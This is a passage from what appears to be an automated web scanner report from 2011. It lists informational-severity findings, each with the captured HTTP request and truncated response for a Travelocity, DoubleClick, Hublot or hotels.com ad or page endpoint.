P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...

27.21. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...

27.22. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...

27.23. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...

27.24. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...

27.25. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...

27.26. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...

27.27. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...

27.28. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=3081322;type=flood471;cat=hublo997;ord=2512447414919.734? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 02 Oct 2011 23:59:02 GMT
Expires: Sun, 02 Oct 2011 23:59:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

27.29. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=425A3F0D7D8F379F923F9D8944F00D2B; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:20 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...

27.30. http://hublotnation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script
...[SNIP]...

27.31. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Request

GET /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 455
Content-Type: text/html

<!-- socials postings -->
<dl id="socials-postings">
   <dt><label for="post-to-facebook">Post to my facebook</label><input type="checkbox" id="post-to-facebook" /></dt>
   <dt><label for="post-to-twitter
...[SNIP]...

27.32. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
